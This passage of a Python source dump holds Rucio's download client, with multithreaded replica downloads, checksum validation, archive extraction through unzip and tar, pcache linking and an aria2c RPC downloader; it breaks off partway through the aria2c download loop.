source
stringlengths
3
86
python
stringlengths
75
1.04M
downloadclient.py
# Copyright 2018 CERN for the benefit of the ATLAS collaboration. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Authors: # - Tomas Javurek <tomasjavurek09@gmail.com>, 2018 # - Vincent Garonne <vgaronne@gmail.com>, 2018 # - Joaquin Bogado <jbogado@linti.unlp.edu.ar>, 2018 # - Nicolo Magini <nicolo.magini@cern.ch>, 2018-2019 # - Tobias Wegner <tobias.wegner@cern.ch>, 2018-2019 # - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019 # - Martin Barisits <martin.barisits@cern.ch>, 2019 # - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019 # - Thomas Beermann <thomas.beermann@cern.ch>, 2021 # - Radu Carpa <radu.carpa@cern.ch>, 2021 # # PY3K COMPATIBLE from __future__ import division import copy import logging import os import random import shutil import signal import time try: from Queue import Queue, Empty, deque except ImportError: from queue import Queue, Empty, deque from threading import Thread from rucio.client.client import Client from rucio.common.exception import (InputValidationError, NoFilesDownloaded, NotAllFilesDownloaded, RucioException) from rucio.common.didtype import DIDType from rucio.common.pcache import Pcache from rucio.common.utils import adler32, detect_client_location, generate_uuid, parse_replicas_from_string, \ send_trace, sizefmt, execute, parse_replicas_from_file from rucio.common.utils import GLOBALLY_SUPPORTED_CHECKSUMS, CHECKSUM_ALGO_DICT, PREFERRED_CHECKSUM from rucio.rse import rsemanager as rsemgr from rucio import version class 
class BaseExtractionTool:

    def __init__(self, program_name, useability_check_args, extract_args, logger=logging.log):
        """
        Initialises a extraction tool object

        :param program_name: the name of the archive extraction program, e.g., unzip
        :param useability_check_args: the arguments of the extraction program to test if its installed, e.g., --version
        :param extract_args: the arguments that will be passed to the program for extraction
        :param logger: optional decorated logging.log object that can be passed from the calling daemon or client.
        """
        self.program_name = program_name
        self.useability_check_args = useability_check_args
        self.extract_args = extract_args
        self.logger = logger
        # None = not yet probed; True/False once is_useable() has run.
        self.is_useable_result = None

    def is_useable(self):
        """
        Checks if the extraction tool is installed and usable

        :returns: True if it is usable otherwise False
        """
        if self.is_useable_result is not None:
            return self.is_useable_result
        # BUG FIX: the result was previously stored under a misspelled
        # attribute (is_usable_result), so the memoisation check above never
        # hit and the method returned the wrong attribute on first call.
        self.is_useable_result = False
        cmd = '%s %s' % (self.program_name, self.useability_check_args)
        try:
            exitcode, out, err = execute(cmd)
            exitcode = int(exitcode)
            self.logger(logging.DEBUG, '"%s" returned with exitcode %d' % (cmd, exitcode))
            self.is_useable_result = (exitcode == 0)
        except Exception as error:
            # BUG FIX: previously formatted with `exitcode`, which is unbound
            # when execute() itself raises; log the command instead.
            self.logger(logging.DEBUG, 'Failed to execute: "%s"' % cmd)
            self.logger(logging.DEBUG, error)
        return self.is_useable_result

    def try_extraction(self, archive_file_path, file_to_extract, dest_dir_path):
        """
        Calls the extraction program to extract a file from an archive

        :param archive_file_path: path to the archive
        :param file_to_extract: file name to extract from the archive
        :param dest_dir_path: destination directory where the extracted file will be stored

        :returns: True on success otherwise False
        """
        if not self.is_useable():
            return False
        args_map = {'archive_file_path': archive_file_path,
                    'file_to_extract': file_to_extract,
                    'dest_dir_path': dest_dir_path}
        extract_args = self.extract_args % args_map
        cmd = '%s %s' % (self.program_name, extract_args)
        try:
            exitcode, out, err = execute(cmd)
            exitcode = int(exitcode)
            self.logger(logging.DEBUG, '"%s" returned with exitcode %d' % (cmd, exitcode))
            return (exitcode == 0)
        except Exception as error:
            # BUG FIX: same unbound-`exitcode` problem as in is_useable().
            self.logger(logging.DEBUG, 'Failed to execute: "%s"' % cmd)
            self.logger(logging.DEBUG, error)
            return False
class DownloadClient:

    def __init__(self, client=None, logger=None, tracing=True, check_admin=False, check_pcache=False):
        """
        Initialises the basic settings for an DownloadClient object

        :param client: Optional: rucio.client.client.Client object. If None, a new object will be created.
        :param logger: Optional: logging.Logger object. If None, default logger will be used.
        :param tracing: Optional: whether traces should be sent (Default: True)
        :param check_admin: Optional: probe the account attributes for admin rights (Default: False)
        :param check_pcache: Optional: enable pcache integration for downloads (Default: False)
        """
        self.check_pcache = check_pcache
        if not logger:
            self.logger = logging.log
        else:
            self.logger = logger.log

        self.tracing = tracing
        if not self.tracing:
            # BUG FIX: was `logger(...)` — the raw parameter is either None or
            # a logging.Logger, neither of which is callable; use the bound
            # log function instead.
            self.logger(logging.DEBUG, 'Tracing is turned off.')
        self.is_human_readable = True
        self.client = client if client else Client()
        # if token should be used, use only JWT tokens
        self.auth_token = self.client.auth_token if len(self.client.auth_token.split(".")) == 3 else None

        self.client_location = detect_client_location()

        self.is_tape_excluded = True
        self.is_admin = False
        if check_admin:
            account_attributes = list(self.client.list_account_attributes(self.client.account))
            for attr in account_attributes[0]:
                if attr['key'] == 'admin':
                    self.is_admin = attr['value'] is True
                    break
        if self.is_admin:
            self.is_tape_excluded = False
            # BUG FIX: same non-callable `logger` problem as above.
            self.logger(logging.DEBUG, 'Admin mode enabled')

        # template merged into every trace sent for a download
        self.trace_tpl = {}
        self.trace_tpl['hostname'] = self.client_location['fqdn']
        self.trace_tpl['localSite'] = self.client_location['site']
        self.trace_tpl['account'] = self.client.account
        if self.client.vo != 'def':
            self.trace_tpl['vo'] = self.client.vo
        self.trace_tpl['eventType'] = 'download'
        self.trace_tpl['eventVersion'] = 'api_%s' % version.RUCIO_VERSION[0]

        self.use_cea_threshold = 10
        self.extraction_tools = []

        # unzip <archive_file_path> <did_name> -d <dest_dir_path>
        extract_args = '%(archive_file_path)s %(file_to_extract)s -d %(dest_dir_path)s'
        self.extraction_tools.append(BaseExtractionTool('unzip', '-v', extract_args, logger=self.logger))

        # tar -C <dest_dir_path> -xf <archive_file_path> <did_name>
        extract_args = '-C %(dest_dir_path)s -xf %(archive_file_path)s %(file_to_extract)s'
        self.extraction_tools.append(BaseExtractionTool('tar', '--version', extract_args, logger=self.logger))
:param trace_custom_fields: Custom key value pairs to send with the traces :param traces_copy_out: reference to an external list, where the traces should be uploaded :returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState clientState can be one of the following: ALREADY_DONE, DONE, FILE_NOT_FOUND, FAIL_VALIDATE, FAILED :raises InputValidationError: if one of the input items is in the wrong format :raises NoFilesDownloaded: if no files could be downloaded :raises NotAllFilesDownloaded: if not all files could be downloaded :raises RucioException: if something unexpected went wrong during the download """ logger = self.logger trace_custom_fields['uuid'] = generate_uuid() logger(logging.INFO, 'Processing %d item(s) for input' % len(items)) input_items = [] for item in items: did_str = item.get('did') pfn = item.get('pfn') rse = item.get('rse') if not did_str or not pfn or not rse: logger(logging.DEBUG, item) raise InputValidationError('The keys did, pfn, and rse are mandatory') logger(logging.DEBUG, 'Preparing PFN download of %s (%s) from %s' % (did_str, pfn, rse)) if '*' in did_str: logger(logging.DEBUG, did_str) raise InputValidationError('Cannot use PFN download with wildcard in DID') did_scope, did_name = self._split_did_str(did_str) dest_dir_path = self._prepare_dest_dir(item.get('base_dir', '.'), did_scope, item.get('no_subdir')) item['scope'] = did_scope item['name'] = did_name item['sources'] = [{'pfn': pfn, 'rse': rse}] dest_file_path = os.path.join(dest_dir_path, did_name) item['dest_file_paths'] = [dest_file_path] item['temp_file_path'] = '%s.part' % dest_file_path options = item.setdefault('merged_options', {}) options['ignore_checksum'] = 'adler32' not in item and 'md5' not in item options.setdefault('transfer_timeout', item.pop('transfer_timeout', None)) input_items.append(item) num_files_in = len(input_items) output_items = self._download_multithreaded(input_items, num_threads, 
trace_custom_fields, traces_copy_out) num_files_out = len(output_items) if num_files_in != num_files_out: raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out)) return self._check_output(output_items) def download_dids(self, items, num_threads=2, trace_custom_fields={}, traces_copy_out=None): """ Download items with given DIDs. This function can also download datasets and wildcarded DIDs. :param items: List of dictionaries. Each dictionary describing an item to download. Keys: did - DID string of this file (e.g. 'scope:file.name') filters - Filter to select DIDs for download. Optional if DID is given rse - Optional: rse name (e.g. 'CERN-PROD_DATADISK') or rse expression from where to download no_resolve_archives - Optional: bool indicating whether archives should not be considered for download (Default: False) resolve_archives - Deprecated: Use no_resolve_archives instead force_scheme - Optional: force a specific scheme to download this item. (Default: None) base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.') no_subdir - Optional: If true, files are written directly into base_dir. (Default: False) nrandom - Optional: if the DID addresses a dataset, nrandom files will be randomly choosen for download from the dataset ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalouge. (Default: False) transfer_timeout - Optional: Timeout time for the download protocols. (Default: None) :param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high. :param trace_custom_fields: Custom key value pairs to send with the traces. 
:param traces_copy_out: reference to an external list, where the traces should be uploaded :returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState :raises InputValidationError: if one of the input items is in the wrong format :raises NoFilesDownloaded: if no files could be downloaded :raises NotAllFilesDownloaded: if not all files could be downloaded :raises RucioException: if something unexpected went wrong during the download """ logger = self.logger trace_custom_fields['uuid'] = generate_uuid() logger(logging.INFO, 'Processing %d item(s) for input' % len(items)) download_info = self._resolve_and_merge_input_items(copy.deepcopy(items)) did_to_options = download_info['did_to_options'] merged_items = download_info['merged_items'] self.logger(logging.DEBUG, 'num_unmerged_items=%d; num_dids=%d; num_merged_items=%d' % (len(items), len(did_to_options), len(merged_items))) logger(logging.INFO, 'Getting sources of DIDs') # if one item wants to resolve archives we enable it for all items resolve_archives = not all(item.get('no_resolve_archives') for item in merged_items) merged_items_with_sources = self._get_sources(merged_items, resolve_archives=resolve_archives) input_items = self._prepare_items_for_download(did_to_options, merged_items_with_sources, resolve_archives=resolve_archives) num_files_in = len(input_items) output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out) num_files_out = len(output_items) if num_files_in != num_files_out: raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out)) return self._check_output(output_items) def download_from_metalink_file(self, item, metalink_file_path, num_threads=2, trace_custom_fields={}, traces_copy_out=None): """ Download items using a given metalink file. :param item: dictionary describing an item to download. 
Keys: base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.') no_subdir - Optional: If true, files are written directly into base_dir. (Default: False) ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalouge. (Default: False) transfer_timeout - Optional: Timeout time for the download protocols. (Default: None) :param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high. :param trace_custom_fields: Custom key value pairs to send with the traces. :param traces_copy_out: reference to an external list, where the traces should be uploaded :returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState :raises InputValidationError: if one of the input items is in the wrong format :raises NoFilesDownloaded: if no files could be downloaded :raises NotAllFilesDownloaded: if not all files could be downloaded :raises RucioException: if something unexpected went wrong during the download """ logger = self.logger logger(logging.INFO, 'Getting sources from metalink file') metalinks = parse_replicas_from_file(metalink_file_path) trace_custom_fields['uuid'] = generate_uuid() did_to_options = {} item.setdefault('destinations', set()).add((item['base_dir'], item['no_subdir'])) for metalink in metalinks: did_to_options[metalink['did']] = item metalinks = [metalinks] input_items = self._prepare_items_for_download(did_to_options, metalinks) num_files_in = len(input_items) output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out) num_files_out = len(output_items) if num_files_in != num_files_out: raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out)) return self._check_output(output_items) def _download_multithreaded(self, input_items, num_threads, 
trace_custom_fields={}, traces_copy_out=None): """ Starts an appropriate number of threads to download items from the input list. (This function is meant to be used as class internal only) :param input_items: list containing the input items to download :param num_threads: suggestion of how many threads should be started :param trace_custom_fields: Custom key value pairs to send with the traces :param traces_copy_out: reference to an external list, where the traces should be uploaded :returns: list with output items as dictionaries """ logger = self.logger num_files = len(input_items) nlimit = 5 num_threads = max(1, num_threads) num_threads = min(num_files, num_threads, nlimit) input_queue = Queue() output_queue = Queue() input_queue.queue = deque(input_items) if num_threads < 2: logger(logging.INFO, 'Using main thread to download %d file(s)' % num_files) self._download_worker(input_queue, output_queue, trace_custom_fields, traces_copy_out, '') return list(output_queue.queue) logger(logging.INFO, 'Using %d threads to download %d files' % (num_threads, num_files)) threads = [] for thread_num in range(0, num_threads): log_prefix = 'Thread %s/%s: ' % (thread_num, num_threads) kwargs = {'input_queue': input_queue, 'output_queue': output_queue, 'trace_custom_fields': trace_custom_fields, 'traces_copy_out': traces_copy_out, 'log_prefix': log_prefix} try: thread = Thread(target=self._download_worker, kwargs=kwargs) thread.start() threads.append(thread) except Exception as error: logger(logging.WARNING, 'Failed to start thread %d' % thread_num) logger(logging.DEBUG, error) try: logger(logging.DEBUG, 'Waiting for threads to finish') for thread in threads: thread.join() except KeyboardInterrupt: logger(logging.WARNING, 'You pressed Ctrl+C! 
Exiting gracefully') for thread in threads: thread.kill_received = True return list(output_queue.queue) def _download_worker(self, input_queue, output_queue, trace_custom_fields, traces_copy_out, log_prefix): """ This function runs as long as there are items in the input queue, downloads them and stores the output in the output queue. (This function is meant to be used as class internal only) :param input_queue: queue containing the input items to download :param output_queue: queue where the output items will be stored :param trace_custom_fields: Custom key value pairs to send with the traces :param traces_copy_out: reference to an external list, where the traces should be uploaded :param log_prefix: string that will be put at the beginning of every log message """ logger = self.logger logger(logging.DEBUG, '%sStart processing queued downloads' % log_prefix) while True: try: item = input_queue.get_nowait() except Empty: break try: trace = copy.deepcopy(self.trace_tpl) trace.update(trace_custom_fields) download_result = self._download_item(item, trace, traces_copy_out, log_prefix) output_queue.put(download_result) except KeyboardInterrupt: logger(logging.WARNING, 'You pressed Ctrl+C! Exiting gracefully') os.kill(os.getpgid(), signal.SIGINT) break except Exception as error: logger(logging.ERROR, '%sFailed to download item' % log_prefix) logger(logging.DEBUG, error) def _download_item(self, item, trace, traces_copy_out, log_prefix=''): """ Downloads the given item and sends traces for success/failure. 
(This function is meant to be used as class internal only) :param item: dictionary that describes the item to download :param trace: dictionary representing a pattern of trace that will be send :param traces_copy_out: reference to an external list, where the traces should be uploaded :param log_prefix: string that will be put at the beginning of every log message :returns: dictionary with all attributes from the input item and a clientState attribute """ logger = self.logger pcache = Pcache() if self.check_pcache and len(item.get('archive_items', [])) == 0 else None did_scope = item['scope'] did_name = item['name'] did_str = '%s:%s' % (did_scope, did_name) logger(logging.INFO, '%sPreparing download of %s' % (log_prefix, did_str)) trace['scope'] = did_scope trace['filename'] = did_name trace.setdefault('datasetScope', item.get('dataset_scope', '')) trace.setdefault('dataset', item.get('dataset_name', '')) trace.setdefault('filesize', item.get('bytes')) trace.setdefault('clientState', 'PROCESSING') trace.setdefault('stateReason', 'UNKNOWN') dest_file_paths = item['dest_file_paths'] # appending trace to list reference, if the reference exists if traces_copy_out is not None: traces_copy_out.append(trace) # if file already exists make sure it exists at all destination paths, set state, send trace, and return for dest_file_path in dest_file_paths: if os.path.isfile(dest_file_path): if not item.get('merged_options', {}).get('ignore_checksum', False): verified, _, _ = _verify_checksum(item, dest_file_path) if not verified: logger(logging.INFO, '%sFile with same name exists locally, but checksum mismatches: %s' % (log_prefix, did_str)) continue logger(logging.INFO, '%sFile exists already locally: %s' % (log_prefix, did_str)) for missing_file_path in dest_file_paths: if not os.path.isfile(missing_file_path): logger(logging.DEBUG, "copying '%s' to '%s'" % (dest_file_path, missing_file_path)) shutil.copy2(dest_file_path, missing_file_path) item['clientState'] = 'ALREADY_DONE' 
trace['transferStart'] = time.time() trace['transferEnd'] = time.time() trace['clientState'] = 'ALREADY_DONE' send_trace(trace, self.client.host, self.client.user_agent) return item # check if file has replicas sources = item.get('sources') if not sources or not len(sources): logger(logging.WARNING, '%sNo available source found for file: %s' % (log_prefix, did_str)) item['clientState'] = 'FILE_NOT_FOUND' trace['clientState'] = 'FILE_NOT_FOUND' trace['stateReason'] = 'No available sources' self._send_trace(trace) return item # checking Pcache storage_prefix = None if pcache: # to check only first replica is enough pfn = sources[0]['pfn'] rse_name = sources[0]['rse'] # protocols are needed to extract deterministic part of the pfn scheme = None prots = self.client.get_protocols(rse_name) for prot in prots: if prot['scheme'] in pfn and prot['prefix'] in pfn: scheme = prot['scheme'] storage_prefix = prot['prefix'] # proceed with the actual check logger(logging.INFO, 'Checking whether %s is in pcache' % dest_file_path) pcache_state = None hardlink_state = None try: pcache_state, hardlink_state = pcache.check_and_link(src=pfn, storage_root=storage_prefix, dst=dest_file_path) except Exception as e: logger(logging.WARNING, 'Pcache failure: %s' % str(e)) # if file found in pcache, send trace and return if pcache_state == 0 and hardlink_state == 1: logger(logging.INFO, 'File found in pcache.') item['clientState'] = 'FOUND_IN_PCACHE' trace['transferStart'] = time.time() trace['transferEnd'] = time.time() trace['clientState'] = 'FOUND_IN_PCACHE' self._send_trace(trace) return item else: logger(logging.INFO, 'File not found in pcache.') # try different PFNs until one succeeded temp_file_path = item['temp_file_path'] success = False i = 0 while not success and i < len(sources): source = sources[i] i += 1 pfn = source['pfn'] rse_name = source['rse'] scheme = pfn.split(':')[0] try: rse = rsemgr.get_rse_info(rse_name, vo=self.client.vo) except RucioException as error: 
logger(logging.WARNING, '%sCould not get info of RSE %s: %s' % (log_prefix, rse_name, error)) trace['stateReason'] = str(error) continue trace['remoteSite'] = rse_name trace['clientState'] = 'DOWNLOAD_ATTEMPT' trace['protocol'] = scheme logger(logging.INFO, '%sTrying to download with %s from %s: %s ' % (log_prefix, scheme, rse_name, did_str)) try: protocol = rsemgr.create_protocol(rse, operation='read', scheme=scheme, auth_token=self.auth_token, logger=logger) protocol.connect() except Exception as error: logger(logging.WARNING, '%sFailed to create protocol for PFN: %s' % (log_prefix, pfn)) logger(logging.DEBUG, 'scheme: %s, exception: %s' % (scheme, error)) trace['stateReason'] = str(error) continue attempt = 0 retries = 2 # do some retries with the same PFN if the download fails while not success and attempt < retries: attempt += 1 item['attemptnr'] = attempt if os.path.isfile(temp_file_path): logger(logging.DEBUG, '%sDeleting existing temporary file: %s' % (log_prefix, temp_file_path)) os.unlink(temp_file_path) start_time = time.time() try: protocol.get(pfn, temp_file_path, transfer_timeout=item.get('merged_options', {}).get('transfer_timeout')) success = True except Exception as error: logger(logging.DEBUG, error) trace['clientState'] = str(type(error).__name__) trace['stateReason'] = str(error) end_time = time.time() if success and not item.get('merged_options', {}).get('ignore_checksum', False): verified, rucio_checksum, local_checksum = _verify_checksum(item, temp_file_path) if not verified: success = False os.unlink(temp_file_path) logger(logging.WARNING, '%sChecksum validation failed for file: %s' % (log_prefix, did_str)) logger(logging.DEBUG, 'Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum)) trace['clientState'] = 'FAIL_VALIDATE' trace['stateReason'] = 'Checksum validation failed: Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum) if not success: logger(logging.WARNING, '%sDownload attempt failed. 
Try %s/%s' % (log_prefix, attempt, retries)) self._send_trace(trace) protocol.close() if not success: logger(logging.ERROR, '%sFailed to download file %s' % (log_prefix, did_str)) item['clientState'] = 'FAILED' return item dest_file_path_iter = iter(dest_file_paths) first_dest_file_path = next(dest_file_path_iter) logger(logging.DEBUG, "renaming '%s' to '%s'" % (temp_file_path, first_dest_file_path)) os.rename(temp_file_path, first_dest_file_path) # if the file was downloaded with success, it can be linked to pcache if pcache: logger(logging.INFO, 'File %s is going to be registerred into pcache.' % dest_file_path) try: pcache_state, hardlink_state = pcache.check_and_link(src=pfn, storage_root=storage_prefix, local_src=first_dest_file_path) logger(logging.INFO, 'File %s is now registerred into pcache.' % first_dest_file_path) except Exception as e: logger(logging.WARNING, 'Failed to load file to pcache: %s' % str(e)) for cur_dest_file_path in dest_file_path_iter: logger(logging.DEBUG, "copying '%s' to '%s'" % (first_dest_file_path, cur_dest_file_path)) shutil.copy2(first_dest_file_path, cur_dest_file_path) trace['transferStart'] = start_time trace['transferEnd'] = end_time trace['clientState'] = 'DONE' trace['stateReason'] = 'OK' item['clientState'] = 'DONE' self._send_trace(trace) duration = round(end_time - start_time, 2) size = item.get('bytes') size_str = sizefmt(size, self.is_human_readable) if size and duration: rate = round((size / duration) * 1e-6, 2) logger(logging.INFO, '%sFile %s successfully downloaded. 
%s in %s seconds = %s MBps' % (log_prefix, did_str, size_str, duration, rate)) else: logger(logging.INFO, '%sFile %s successfully downloaded in %s seconds' % (log_prefix, did_str, duration)) file_items_in_archive = item.get('archive_items', []) if len(file_items_in_archive) > 0: logger(logging.INFO, '%sExtracting %d file(s) from %s' % (log_prefix, len(file_items_in_archive), did_name)) archive_file_path = first_dest_file_path for file_item in file_items_in_archive: extraction_ok = False extract_file_name = file_item['name'] dest_file_path_iter = iter(file_item['dest_file_paths']) first_dest_file_path = next(dest_file_path_iter) dest_dir = os.path.dirname(first_dest_file_path) logger(logging.DEBUG, '%sExtracting %s to %s' % (log_prefix, extract_file_name, dest_dir)) for extraction_tool in self.extraction_tools: if extraction_tool.try_extraction(archive_file_path, extract_file_name, dest_dir): extraction_ok = True break if not extraction_ok: logger(logging.ERROR, 'Extraction of file %s from archive %s failed.' % (extract_file_name, did_name)) continue first_dest_file_path = os.path.join(dest_dir, extract_file_name) for cur_dest_file_path in dest_file_path_iter: logger(logging.DEBUG, "copying '%s' to '%s'" % (first_dest_file_path, cur_dest_file_path)) shutil.copy2(first_dest_file_path, cur_dest_file_path) if not item.get('shall_keep_archive'): logger(logging.DEBUG, '%sDeleting archive %s' % (log_prefix, did_name)) os.remove(archive_file_path) return item def download_aria2c(self, items, trace_custom_fields={}, filters={}): """ Uses aria2c to download the items with given DIDs. This function can also download datasets and wildcarded DIDs. It only can download files that are available via https/davs. Aria2c needs to be installed and X509_USER_PROXY needs to be set! :param items: List of dictionaries. Each dictionary describing an item to download. Keys: did - DID string of this file (e.g. 'scope:file.name'). Wildcards are not allowed rse - Optional: rse name (e.g. 
'CERN-PROD_DATADISK') or rse expression from where to download base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.') no_subdir - Optional: If true, files are written directly into base_dir. (Default: False) nrandom - Optional: if the DID addresses a dataset, nrandom files will be randomly choosen for download from the dataset ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalouge. (Default: False) :param trace_custom_fields: Custom key value pairs to send with the traces :param filters: dictionary containing filter options :returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState :raises InputValidationError: if one of the input items is in the wrong format :raises NoFilesDownloaded: if no files could be downloaded :raises NotAllFilesDownloaded: if not all files could be downloaded :raises RucioException: if something went wrong during the download (e.g. 
aria2c could not be started) """ logger = self.logger trace_custom_fields['uuid'] = generate_uuid() rpc_secret = '%x' % (random.getrandbits(64)) rpc_auth = 'token:%s' % rpc_secret rpcproc, aria_rpc = self._start_aria2c_rpc(rpc_secret) for item in items: item['force_scheme'] = ['https', 'davs'] logger(logging.INFO, 'Processing %d item(s) for input' % len(items)) download_info = self._resolve_and_merge_input_items(copy.deepcopy(items)) did_to_options = download_info['did_to_options'] merged_items = download_info['merged_items'] self.logger(logging.DEBUG, 'num_unmerged_items=%d; num_dids=%d; num_merged_items=%d' % (len(items), len(did_to_options), len(merged_items))) logger(logging.INFO, 'Getting sources of DIDs') merged_items_with_sources = self._get_sources(merged_items) input_items = self._prepare_items_for_download(did_to_options, merged_items_with_sources, resolve_archives=False) try: output_items = self._download_items_aria2c(input_items, aria_rpc, rpc_auth, trace_custom_fields) except Exception as error: self.logger(logging.ERROR, 'Unknown exception during aria2c download') self.logger(logging.DEBUG, error) finally: try: aria_rpc.aria2.forceShutdown(rpc_auth) finally: rpcproc.terminate() return self._check_output(output_items) def _start_aria2c_rpc(self, rpc_secret): """ Starts aria2c in RPC mode as a subprocess. Also creates the RPC proxy instance. 
    def _start_aria2c_rpc(self, rpc_secret):
        """
        Starts aria2c in RPC mode as a subprocess. Also creates
        the RPC proxy instance.
        (This function is meant to be used as class internal only)

        :param rpc_secret: the secret for the RPC proxy

        :returns: a tupel with the process and the rpc proxy objects

        :raises RucioException: if the process or the proxy could not be created
        """
        logger = self.logger
        try:
            from xmlrpclib import ServerProxy as RPCServerProxy  # py2
        except ImportError:
            from xmlrpc.client import ServerProxy as RPCServerProxy

        # aria2c is tied to this client process (--stop-with-process) and
        # authenticates TLS with the user's grid proxy
        cmd = 'aria2c '\
              '--enable-rpc '\
              '--certificate=$X509_USER_PROXY '\
              '--private-key=$X509_USER_PROXY '\
              '--ca-certificate=/etc/pki/tls/certs/CERN-bundle.pem '\
              '--quiet=true '\
              '--allow-overwrite=true '\
              '--auto-file-renaming=false '\
              '--stop-with-process=%d '\
              '--rpc-secret=%s '\
              '--rpc-listen-all=false '\
              '--rpc-max-request-size=100M '\
              '--connect-timeout=5 '\
              '--rpc-listen-port=%d'

        logger(logging.INFO, 'Starting aria2c rpc server...')

        # trying up to 3 random ports
        for attempt in range(3):
            port = random.randint(1024, 65534)
            logger(logging.DEBUG, 'Trying to start rpc server on port: %d' % port)
            try:
                to_exec = cmd % (os.getpid(), rpc_secret, port)
                logger(logging.DEBUG, to_exec)
                # non-blocking execute: returns the running subprocess handle
                rpcproc = execute(to_exec, False)
            except Exception as error:
                raise RucioException('Failed to execute aria2c!', error)

            # if port is in use aria should fail to start so give it some time
            time.sleep(2)

            # did it fail?
            if rpcproc.poll() is not None:
                (out, err) = rpcproc.communicate()
                logger(logging.DEBUG, 'Failed to start aria2c with port: %d' % port)
                logger(logging.DEBUG, 'aria2c output: %s' % out)
            else:
                break

        # still dead after all attempts -> give up
        if rpcproc.poll() is not None:
            raise RucioException('Failed to start aria2c rpc server!')

        try:
            aria_rpc = RPCServerProxy('http://localhost:%d/rpc' % port)
        except Exception as error:
            # don't leave an orphaned aria2c process behind
            rpcproc.kill()
            raise RucioException('Failed to initialise rpc proxy!', error)
        return (rpcproc, aria_rpc)
        Aria2c needs to be started as RPC background process first and a RPC proxy is needed.
        (This function is meant to be used as class internal only)

        :param items: list of dictionaries containing one dict for each file to download
        :param aria_rcp: RPCProxy to the aria2c process
        :param rpc_auth: the rpc authentication token
        :param trace_custom_fields: Custom key value pairs to send with the traces

        :returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
        """
        logger = self.logger

        gid_to_item = {}  # maps an aria2c download id (gid) to the download item
        pfn_to_rse = {}  # remembers which RSE each queued PFN came from, for the traces
        items_to_queue = [item for item in items]

        # items get removed from gid_to_item when they are complete or failed;
        # the loop alternates between queueing new downloads and polling aria2c
        while len(gid_to_item) or len(items_to_queue):
            num_queued = 0

            # queue up to 100 files and then check arias status
            while (num_queued < 100) and len(items_to_queue):
                item = items_to_queue.pop()

                file_scope = item['scope']
                file_name = item['name']
                file_did_str = '%s:%s' % (file_scope, file_name)
                trace = {'scope': file_scope,
                         'filename': file_name,
                         'datasetScope': item.get('dataset_scope', ''),
                         'dataset': item.get('dataset_name', ''),
                         'protocol': 'https',
                         'remoteSite': '',
                         'filesize': item.get('bytes', None),
                         'transferStart': time.time(),
                         'transferEnd': time.time()}
                trace.update(self.trace_tpl)
                trace.update(trace_custom_fields)

                # get pfns from all replicas; davs is rewritten to https because
                # aria2c only understands the https scheme
                pfns = []
                for src in item['sources']:
                    pfn = src['pfn']
                    if pfn[0:4].lower() == 'davs':
                        pfn = pfn.replace('davs', 'https', 1)
                    pfns.append(pfn)
                    pfn_to_rse[pfn] = src['rse']

                # does file exist and are sources available?
                # workaround: only consider first dest file path for aria2c download
                dest_file_path = next(iter(item['dest_file_paths']))
                if os.path.isfile(dest_file_path):
                    logger(logging.INFO, 'File exists already locally: %s' % file_did_str)
                    item['clientState'] = 'ALREADY_DONE'
                    trace['clientState'] = 'ALREADY_DONE'
                    self._send_trace(trace)
                elif len(pfns) == 0:
                    logger(logging.WARNING, 'No available source found for file: %s' % file_did_str)
                    item['clientState'] = 'FILE_NOT_FOUND'
                    trace['clientState'] = 'FILE_NOT_FOUND'
                    self._send_trace(trace)
                else:
                    item['trace'] = trace
                    # download to the temporary .part name; renamed on success below
                    options = {'dir': os.path.dirname(dest_file_path),
                               'out': os.path.basename(item['temp_file_path'])}
                    gid = aria_rpc.aria2.addUri(rpc_auth, pfns, options)
                    gid_to_item[gid] = item
                    num_queued += 1
                    logger(logging.DEBUG, 'Queued file: %s' % file_did_str)

            # get some statistics
            aria_stat = aria_rpc.aria2.getGlobalStat(rpc_auth)
            num_active = int(aria_stat['numActive'])
            num_waiting = int(aria_stat['numWaiting'])
            num_stopped = int(aria_stat['numStoppedTotal'])

            # save start time if one of the active downloads has started
            active = aria_rpc.aria2.tellActive(rpc_auth, ['gid', 'completedLength'])
            for dlinfo in active:
                gid = dlinfo['gid']
                if int(dlinfo['completedLength']) > 0:
                    gid_to_item[gid].setdefault('transferStart', time.time())

            stopped = aria_rpc.aria2.tellStopped(rpc_auth, -1, num_stopped, ['gid', 'status', 'files'])
            for dlinfo in stopped:
                gid = dlinfo['gid']
                item = gid_to_item[gid]

                file_scope = item['scope']
                file_name = item['name']
                file_did_str = '%s:%s' % (file_scope, file_name)
                temp_file_path = item['temp_file_path']
                # workaround: only consider first dest file path for aria2c download
                dest_file_path = next(iter(item['dest_file_paths']))

                # ensure we didnt miss the active state (e.g. a very fast download)
                start_time = item.setdefault('transferStart', time.time())
                end_time = item.setdefault('transferEnd', time.time())

                # get used pfn for traces
                trace = item['trace']
                for uri in dlinfo['files'][0]['uris']:
                    if uri['status'].lower() == 'used':
                        trace['remoteSite'] = pfn_to_rse.get(uri['uri'], '')

